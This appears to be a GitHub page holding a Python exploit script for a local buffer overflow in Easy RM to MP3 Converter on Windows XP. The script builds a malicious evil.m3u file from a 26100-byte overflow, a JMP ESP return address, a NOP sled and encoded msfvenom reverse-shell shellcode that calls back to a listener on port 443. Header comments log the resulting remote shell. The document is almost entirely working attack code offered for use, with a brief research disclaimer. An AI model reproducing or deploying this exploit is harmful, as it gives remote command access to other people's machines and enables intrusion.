-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-easyrmtomp3converter.py
70 lines (65 loc) · 3.17 KB
/
exploit-easyrmtomp3converter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Easy RM to MP3 Converter Exploit - Local Buffer Overflow
#
# How I tested it:
# - Windows XP SP2 (Metasploitable will do) and Kali.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe
# - pattern_create.rb and pattern_offset.rb = 26100
# - Bachars = \x00\x09\x0a
# - Return Address found at 0x7c941eed (JMP ESP) | C:\Arquivos de programas\Easy RM to MP3 Converter\MSRMfilter03.dll
# - Generated the payload using msfvenom
#
# PoC:
# Windows XP:
# C:\Python27>python.exe exploit-easyrmtomp3converter.py
# C:\Python27>
# - Easy RM to MP3 Converter, click on "Load", and select C:\Python27\evil.m3u
# Kali:
# root@kali:~# nc -nlvp 443
# listening on [any] 443 ...connect to [10.0.0.36] from (UNKNOWN) [10.0.0.45] 1083
# Microsoft Windows XP [versao 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Arquivos de programas\Easy RM to MP3 Converter>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
filename = "evil.m3u"
eip = "\xed\x1e\x94\x7c"
nops = "\x90"*100
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a"
# Payload size: 351 bytes
shellcode = ("\xba\x9b\x9c\xbb\x42\xd9\xf6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\xcd\x92\x59\xb7\x0d\x42\x1f"
"\x38\xed\x93\x40\xb0\x08\xa2\x40\xa6\x59\x95\x70\xac\x0f\x1a"
"\xfa\xe0\xbb\xa9\x8e\x2c\xcc\x1a\x24\x0b\xe3\x9b\x15\x6f\x62"
"\x18\x64\xbc\x44\x21\xa7\xb1\x85\x66\xda\x38\xd7\x3f\x90\xef"
"\xc7\x34\xec\x33\x6c\x06\xe0\x33\x91\xdf\x03\x15\x04\x6b\x5a"
"\xb5\xa7\xb8\xd6\xfc\xbf\xdd\xd3\xb7\x34\x15\xaf\x49\x9c\x67"
"\x50\xe5\xe1\x47\xa3\xf7\x26\x6f\x5c\x82\x5e\x93\xe1\x95\xa5"
"\xe9\x3d\x13\x3d\x49\xb5\x83\x99\x6b\x1a\x55\x6a\x67\xd7\x11"
"\x34\x64\xe6\xf6\x4f\x90\x63\xf9\x9f\x10\x37\xde\x3b\x78\xe3"
"\x7f\x1a\x24\x42\x7f\x7c\x87\x3b\x25\xf7\x2a\x2f\x54\x5a\x23"
"\x9c\x55\x64\xb3\x8a\xee\x17\x81\x15\x45\xbf\xa9\xde\x43\x38"
"\xcd\xf4\x34\xd6\x30\xf7\x44\xff\xf6\xa3\x14\x97\xdf\xcb\xfe"
"\x67\xdf\x19\x50\x37\x4f\xf2\x11\xe7\x2f\xa2\xf9\xed\xbf\x9d"
"\x1a\x0e\x6a\xb6\xb1\xf5\xfd\xb3\x45\xf5\xd9\xab\x47\xf5\x20"
"\x97\xc1\x13\x48\xf7\x87\x8c\xe5\x6e\x82\x46\x97\x6f\x18\x23"
"\x97\xe4\xaf\xd4\x56\x0d\xc5\xc6\x0f\xfd\x90\xb4\x86\x02\x0f"
"\xd0\x45\x90\xd4\x20\x03\x89\x42\x77\x44\x7f\x9b\x1d\x78\x26"
"\x35\x03\x81\xbe\x7e\x87\x5e\x03\x80\x06\x12\x3f\xa6\x18\xea"
"\xc0\xe2\x4c\xa2\x96\xbc\x3a\x04\x41\x0f\x94\xde\x3e\xd9\x70"
"\xa6\x0c\xda\x06\xa7\x58\xac\xe6\x16\x35\xe9\x19\x96\xd1\xfd"
"\x62\xca\x41\x01\xb9\x4e\x71\x48\xe3\xe7\x1a\x15\x76\xba\x46"
"\xa6\xad\xf9\x7e\x25\x47\x82\x84\x35\x22\x87\xc1\xf1\xdf\xf5"
"\x5a\x94\xdf\xaa\x5b\xbd")
buffer = "A"*26100 + eip + nops + shellcode + "C"*(30000-26100-4-100)
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close